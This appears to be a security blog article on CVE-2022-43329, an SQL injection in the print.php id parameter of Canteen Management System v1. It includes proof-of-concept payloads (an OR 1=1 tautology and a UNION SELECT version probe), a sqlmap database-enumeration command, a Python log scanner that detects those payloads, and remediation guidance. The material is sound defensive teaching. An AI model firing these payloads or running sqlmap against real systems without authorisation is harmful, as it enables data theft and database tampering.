The digital transformation of basic services like canteens is a huge leap forward for schools, businesses, and other organizations. But just like any other web app, canteen management systems can be vulnerable to cyber-attacks if security isn’t properly considered during development. One particularly concerning issue is SQL injection, which allows attackers to manipulate the web application’s database through malicious user input.

In this article, we’ll take a deep dive into CVE-2022-43329, a security flaw found in Canteen Management System v1. that exposes data and threatens database integrity via the id parameter in print.php. We’ll break down the vulnerability, show a proof of concept, and discuss remediation steps.

What is CVE-2022-43329?

CVE-2022-43329 is a tracked vulnerability assigned by MITRE. It affects the Canteen Management System v1. (the “CMS” for short), allowing unauthorized users to potentially:

- Manipulate or erase records

The root cause is insufficient sanitization of user input. More specifically, the id parameter handled by the script /print.php is not validated before it is passed directly into a SQL query.

How the Vulnerability Works

Most web apps use databases to store and retrieve data dynamically. When a user requests something like /print.php?id=10, the number 10 is read from the URL and then interpolated directly into a SQL query, such as:

// Vulnerable pattern: the raw query-string value is concatenated into the SQL text
$id = $_GET['id'];
$query = "SELECT * FROM orders WHERE id = $id";
// runs the query and displays the results

A malicious actor can modify the URL to include crafted input, like so:

/print.php?id=10 OR 1=1

This changes the query logic to:

SELECT * FROM orders WHERE id = 10 OR 1=1

Because 1=1 is always true, the query returns all orders, not just the one with ID 10.

If the attacker injects more complex SQL, they can extract credentials, add or delete records, and perform other dangerous operations.

Setting up the Lab

Note: Perform these actions only in legal, isolated environments. Never test on production systems without authorization.

To demonstrate, do the following:

- Download and install Canteen Management System v1. on a local web server (e.g., XAMPP, WAMP, or LAMP).
- Set up a MySQL database as per the documentation.
- Browse to /print.php?id=1 to view typical behavior.

Injecting SQL in the id parameter

http://localhost/canteen/print.php?id=1 OR 1=1

This reveals all records (or as many as the page will render).

You can extract information using the following URL:

http://localhost/canteen/print.php?id=1 UNION SELECT 1,@@version,3--

If the page is vulnerable, you'll see the MySQL version presented in one of the table columns.

3. Full SQLMap Example

SQLMap is a popular tool to automate SQL injection discovery and exploitation.

Run:

sqlmap -u "http://localhost/canteen/print.php?id=1" --dbs

SQLMap will attempt various payloads and display available database names if the system is vulnerable.
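Every request shown above also lands in the web server's access log, which is where a defender will see this vulnerability being probed. The following script is an added example, not code from the original post or from the Canteen Management System project: it parses Apache combined-format log lines (constructed here, not taken from any real server), isolates requests to print.php, URL-decodes the id parameter, and flags any value that is not a plain integer, labelling the tautology and UNION shapes discussed in this article.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines (made up for this example, not from a
# real server): a benign request, the two payloads from the article (one of them
# URL-encoded, one using '+' for spaces), and an unrelated page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2022:10:01:02 +0000] "GET /canteen/print.php?id=7 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2022:10:01:10 +0000] "GET /canteen/print.php?id=1%20OR%201%3D1 HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2022:10:01:15 +0000] "GET /canteen/print.php?id=1+UNION+SELECT+1,@@version,3-- HTTP/1.1" 200 1902 "-" "sqlmap/1.6.12"
10.0.0.5 - - [12/Nov/2022:10:02:00 +0000] "GET /canteen/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)
TAUTOLOGY_RE = re.compile(r"\b(or|and)\b\s*\S+\s*=\s*\S+", re.I)


def classify_id(value: str) -> Optional[str]:
    """Return None for a well-formed integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_RE.search(value):
        return "union_select"
    if TAUTOLOGY_RE.search(value):
        return "tautology"
    return "non_numeric"


def scan_log(text: str) -> list:
    """Flag requests to print.php whose id parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        url = urlsplit(m["target"])
        if not url.path.endswith("/print.php"):
            continue
        # parse_qs URL-decodes, so %20 and '+' become spaces before the pattern checks
        for raw_id in parse_qs(url.query).get("id", []):
            kind = classify_id(raw_id)
            if kind:
                findings.append({"ip": m["ip"], "ts": m["ts"], "id": raw_id,
                                 "kind": kind, "ua": m["ua"], "status": m["status"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} id={f['id']!r} -> {f['kind']} (ua={f['ua']})")
```

Anything that is not a plain integer is worth a look, since the legitimate application only ever sends numeric ids to this endpoint; the size field of a flagged 200 response (90211 bytes for the tautology request above) is a useful secondary signal that the injection actually returned extra rows.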

- Sensitive Data Exposure: Attackers can steal user info, transaction records, and credentials.
- Privilege Escalation: If the web server’s database user has high privileges, attackers can deploy further exploits (even backdoors).
- Database Tampering: Modify, delete, or insert arbitrary records, affecting billing or user balances.

1. Use Prepared Statements

Switch from dynamic SQL to prepared statements. In PHP/MySQLi, for example:

// The placeholder keeps user input out of the SQL text entirely
$stmt = $conn->prepare("SELECT * FROM orders WHERE id = ?");
// "i" binds the value as an integer, so "1 OR 1=1" can never reach the parser as SQL
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();

2. Validate Input

Explicitly check that id is numeric before using it:

// Reject anything that is not a numeric string before it reaches the query
if (!is_numeric($_GET['id'])) {
    die("Invalid ID value!");
}

Note that is_numeric() also accepts floats and exponent notation (for example "1.5" or "1e3"), so when the id must be a whole number, filter_var($_GET['id'], FILTER_VALIDATE_INT) is the stricter check. Validation is a complement to prepared statements, not a substitute for them.

3. Least Privilege

Ensure the DB user used by the app has read/write access only to the required tables.

4. Regular Security Audits

Employ tools like SQLMap or Burp Suite to test endpoints for SQL injection.

References & Resources

- Official CVE Details for CVE-2022-43329
- Sourcecodester Canteen Management System v1.
- OWASP Top 10: Injection
- SQLMap Automated SQL Injection Tool

Conclusion

CVE-2022-43329 highlights why web developers must pay attention to secure coding practices. Even useful tools for everyday operations, like a Canteen Management System, can put sensitive data at risk if they don’t properly sanitize user input and use secure database access methods.

If you are using Canteen Management System v1. (or any software with similar design), audit your code, patch vulnerable endpoints, and keep your users safe from such critical vulnerabilities.


Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/01/2022 22:37:00 UTC